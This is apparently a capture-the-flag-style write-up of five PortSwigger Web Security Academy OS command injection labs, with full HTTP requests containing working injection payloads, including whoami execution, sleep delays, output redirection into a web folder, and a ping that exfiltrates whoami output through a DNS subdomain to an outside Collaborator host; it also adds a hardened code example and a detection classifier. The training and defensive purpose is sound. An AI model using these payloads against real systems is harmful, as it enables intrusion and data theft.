Burp Web Academy: Command Injection

0x01. PortSwigger Web Security Academy

PortSwigger Web Security Academy is the free web security training range published by the Burp Suite team. While learning web security concepts you can also practise hands-on Burp Suite skills.

This article walks through the OS Command Injection chapter of the Web Security Academy.

0x02. Command Injection

2.1 Lab: OS command injection, simple case

This lab contains an OS command injection vulnerability in the product stock checker.

The application executes a shell command containing user-supplied product and store IDs, and returns the raw output from the command in its response.

To solve the lab, execute the whoami command to determine the name of the current user.

Visit the URL https://0a46004a04ca1df9817fdf8200f300f2.web-security-academy.net/product?productId=14. At the bottom of the page there is a Check stock button; after clicking it, the following POST request can be seen in Burp Suite:

POST /product/stock HTTP/2
Host: 0a46004a04ca1df9817fdf8200f300f2.web-security-academy.net
Cookie: session=vXIadQwAPKmbmZxQ4EIJ9iSZhSVLaQGW
Content-Length: 22
Sec-Ch-Ua: "Chromium";v="127", "Not)A;Brand";v="99"
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://0a46004a04ca1df9817fdf8200f300f2.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a46004a04ca1df9817fdf8200f300f2.web-security-academy.net/product?productId=14
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

productId=14&storeId=1

Injecting via backticks was tried first and did not work; trying a semicolon instead, productId=1&storeId=2;whoami, the injected command executed successfully.

HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 16

22
peter-8oOYgZ
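As an added example (not the lab's own backend code), here is the shape of the stock-checker defect this lab describes beside a hardened version: the unsafe function only builds the shell line so the problem is visible, while the safe one allow-lists numeric IDs and hands an argv list to subprocess with no shell. The script name stockreport.pl is an assumption.

```python
import re
import subprocess

# Allow-list for a product or store ID: ASCII digits only, bounded length.
ID_RE = re.compile(r"[0-9]{1,9}")


def build_shell_line_unsafe(product_id: str, store_id: str) -> str:
    """The vulnerable pattern the lab describes: untrusted text concatenated
    into one shell line. storeId '2;whoami' turns one command into two.
    Returned as a string only, never executed here."""
    return f"stockreport.pl {product_id} {store_id}"


def is_valid_id(value: str) -> bool:
    """True only for a short run of digits; ';', '|', '`', '$(' all fail."""
    return ID_RE.fullmatch(value) is not None


def build_argv_safe(product_id: str, store_id: str) -> list[str]:
    """Hardened form: validate both IDs, then build an argv list. Passed to
    subprocess with shell=False there is no shell to interpret separators."""
    for name, value in (("productId", product_id), ("storeId", store_id)):
        if not is_valid_id(value):
            raise ValueError(f"{name} must be a numeric ID, got {value!r}")
    return ["stockreport.pl", product_id, store_id]


def check_stock(product_id: str, store_id: str, timeout: float = 5.0) -> str:
    """Run the checker (assumed script name) without a shell and return its
    stdout; invalid IDs raise ValueError before any process is started."""
    argv = build_argv_safe(product_id, store_id)
    result = subprocess.run(argv, shell=False, capture_output=True,
                            text=True, timeout=timeout, check=False)
    return result.stdout


if __name__ == "__main__":
    print(build_shell_line_unsafe("1", "2;whoami"))  # two commands on one line
    print(build_argv_safe("14", "1"))                # ['stockreport.pl', '14', '1']
    for bad in ("2;whoami", "2||sleep 10||", "`whoami`"):
        print(bad, "valid:", is_valid_id(bad))      # all False
```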

2.2 Lab: Blind OS command injection with time delays

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response.

To solve the lab, exploit the blind OS command injection vulnerability to cause a 10 second delay.

Let's ask Copilot what blind injection is (the Chinese-language answer was not quite good enough):

Question: What’s the meaning of blind injection in Web Security?

Answer: In Web Security, “blind injection,” or more specifically, “blind SQL injection,” is a type of SQL injection attack where an attacker sends queries to the database and infers the results based on the behavior of the web application, rather than seeing the data directly.

For example, an attacker might send a query designed to return a true or false result and then observe how the web page responds. If the page’s response changes, the attacker knows that the query affected the database, even though they can’t see the data directly.

This method can be more time-consuming than other types of SQL injection because it requires careful observation and crafting of queries, but it’s still a powerful technique for extracting sensitive information from databases.

If you’re interested in learning more about how to defend against such attacks, I can provide some tips or resources. Just let me know!

Following the lab's hint, there is a Submit feedback link at the top right; use it for injection testing:

  • The injection point is the email field
  • Use sleep 10 to produce the delay
    • An injection character is needed both before and after the injected command, e.g. ;sleep%2010; or ||sleep%2010||
    • The official solution uses ping for the delay (;ping+-c+10+127.0.0.1;)
      • Note: in URL encoding, a space can be encoded not only as %20 but also as +

POST /feedback/submit HTTP/2
Host: 0ada000a04235099835f5fb6007600c8.web-security-academy.net
Cookie: session=KCki6D8u9Sy6u5Vvpn2xzlzoInIThtKF
Content-Length: 98
Sec-Ch-Ua: "Chromium";v="127", "Not)A;Brand";v="99"
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://0ada000a04235099835f5fb6007600c8.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0ada000a04235099835f5fb6007600c8.web-security-academy.net/feedback
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

csrf=aubYsYL43kPMCm2FyEuBeWNbAKGudIEW&name=1&email=2%40gmail.com||sleep%2010||&subject=2&message=3

2.3 Lab: Blind OS command injection with output redirection

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response. However, you can use output redirection to capture the output from the command. There is a writable folder at:

/var/www/images/

The application serves the images for the product catalog from this location. You can redirect the output from the injected command to a file in this folder, and then use the image loading URL to retrieve the contents of the file.

To solve the lab, execute the whoami command and retrieve the output.

Building on the previous lab, this one is straightforward: write the command's output into /var/www/images/, then view the file's contents through the image URL.

POST /feedback/submit HTTP/2
Host: 0a4400c9044f1daf8136fddf00da0017.web-security-academy.net
Cookie: session=9mWga6JAGpv2oYMEFc88AQQucaKnWabL
Content-Length: 117
Sec-Ch-Ua: "Chromium";v="127", "Not)A;Brand";v="99"
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Accept: */*
Origin: https://0a4400c9044f1daf8136fddf00da0017.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a4400c9044f1daf8136fddf00da0017.web-security-academy.net/feedback
Accept-Encoding: gzip, deflate, br
Priority: u=1, i

csrf=woqXf8DV6FUWJtWTZA3KZJfMtcX5wjBU&name=1&email=2%40gmail.com;whoami>/var/www/images/flag.txt;&subject=3&message=4

Then simply fetch it via the image URL:

https://0a4400c9044f1daf8136fddf00da0017.web-security-academy.net/image?filename=flag.txt

2.4 Lab: Blind OS command injection with out-of-band interaction

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application’s response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, exploit the blind OS command injection vulnerability to issue a DNS lookup to Burp Collaborator.

This is still blind injection, but this time the command runs asynchronously, so a time delay can no longer tell us whether the injection worked; here the result is detected by triggering a DNS lookup instead.

Looking at the Burp Collaborator documentation, it seems Burp Suite Community does not include this feature, which is a pity, so I'll use Burp Suite Pro for now :-D

POST /feedback/submit HTTP/2
Host: 0a340036035ad56781a5170c00c3001e.web-security-academy.net
Cookie: session=rpcnlZoYzqHXOMNFaBDPAXRhzfQyjMU4
Content-Length: 140
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://0a340036035ad56781a5170c00c3001e.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a340036035ad56781a5170c00c3001e.web-security-academy.net/feedback
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

csrf=n8QHyGJzWxs0jAJKlHTQC3wr23wNlze9&name=1&email=2%40gmail.com;ping+-c+4+vwvk7vf1wdbva4fzqi26fvxkvb12psdh.oastify.com;&subject=3&message=4

Steps:

  1. Open Burp Suite Pro, click Collaborator and generate a domain
  2. In the HTTP POST request, inject a ping of that domain
  3. Return to Collaborator in Burp; a DNS resolution should already have been triggered. If it is not visible yet, click the Poll now button to refresh

[Figure: Burp Collaborator DNS resolution log]

2.5 Lab: Blind OS command injection with out-of-band data exfiltration

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application’s response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, execute the whoami command and exfiltrate the output via a DNS query to Burp Collaborator. You will need to enter the name of the current user to complete the lab.

This adds a little difficulty on top of the previous lab: not only must a DNS query be triggered, it must also carry the output of whoami. A quick search online shows that the data can be carried in a subdomain label.

POST /feedback/submit HTTP/2
Host: 0aeb00c604ebf6b7814361ed00aa00ed.web-security-academy.net
Cookie: session=PsXwTpAQTtcmERBtVDSEoCJ64RGkstlc
Content-Length: 150
Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://0aeb00c604ebf6b7814361ed00aa00ed.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aeb00c604ebf6b7814361ed00aa00ed.web-security-academy.net/feedback
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

csrf=7Ry8gMMe46FqvD9HJHRqCpswXSz69Bti&name=1&email=2%40gmail.com;ping+-c+4+$(whoami).vwvk7vf1wdbva4fzqi26fvxkvb12psdh.oastify.com;&subject=3&message=4

0x03. Summary

  • Injection can use backticks, semicolons, pipes, &&, ||, etc.; sometimes the injection character must also be appended after the command, e.g. ;payload;
  • Blind injection can use sleep, ping, etc. to introduce a delay
  • In URL encoding, a space can be encoded not only as %20 but also as +
  • Using Burp Collaborator in blind injection
    • DNS resolution, to determine whether the blind injection fired
    • DNS resolution, carrying data in the subdomain
  • DNS resolution can be triggered with commands such as ping and nslookup

0x04. References
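An added detection example (not a Burp feature or PortSwigger code): a small classifier that decodes form bodies like the ones in this write-up and tags each field with the signals listed in this summary. The sample bodies are constructed from the requests above, with the CSRF token and the Collaborator label replaced by placeholders.

```python
import re
from urllib.parse import unquote_plus

# Signals from the summary: shell separators, delay commands, DNS-triggering
# commands, data carried in a subdomain, and output redirected into a file.
SIGNALS = {
    "shell-separator": re.compile(r"[;|&`]|\$\("),
    "time-delay": re.compile(r"\bsleep\s+\d+|\bping\b.*\b(127\.0\.0\.1|localhost)\b"),
    "dns-oob": re.compile(r"\b(ping|nslookup|dig|host|curl|wget)\b\s+.*[A-Za-z0-9-]+\.[A-Za-z]{2,}"),
    "data-in-subdomain": re.compile(r"\$\([^)]*\)\.[A-Za-z0-9.-]+"),
    "output-redirect": re.compile(r">\s*/"),
}


def parse_form(body: str) -> list[tuple[str, str]]:
    """Split an application/x-www-form-urlencoded body on '&' only, then
    decode; unquote_plus maps both '+' and '%20' to a space, so the two
    space encodings noted above are treated alike. ';' is never a separator."""
    pairs = []
    for part in body.split("&"):
        key, _, raw = part.partition("=")
        pairs.append((unquote_plus(key), unquote_plus(raw)))
    return pairs


def classify_body(body: str) -> dict[str, list[str]]:
    """Return {field: sorted signal names} for every field that matches."""
    findings: dict[str, list[str]] = {}
    for field, value in parse_form(body):
        tags = sorted(name for name, rx in SIGNALS.items() if rx.search(value))
        if tags:
            findings[field] = tags
    return findings


# Sample bodies constructed from the requests in this write-up; the CSRF
# token and the Collaborator label are replaced by placeholders.
SAMPLE_BODIES = [
    "productId=14&storeId=1",
    "productId=1&storeId=2;whoami",
    "csrf=CSRF_TOKEN&name=1&email=2%40gmail.com||sleep%2010||&subject=2&message=3",
    "csrf=CSRF_TOKEN&name=1&email=2%40gmail.com;whoami>/var/www/images/flag.txt;&subject=3&message=4",
    "csrf=CSRF_TOKEN&name=1&email=2%40gmail.com;ping+-c+4+COLLAB.oastify.com;&subject=3&message=4",
    "csrf=CSRF_TOKEN&name=1&email=2%40gmail.com;ping+-c+4+$(whoami).COLLAB.oastify.com;&subject=3&message=4",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(classify_body(body) or "clean", "<-", body)
```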

  1. https://portswigger.net/web-security/all-labs#os-command-injection
  2. https://portswigger.net/burp/documentation/collaborator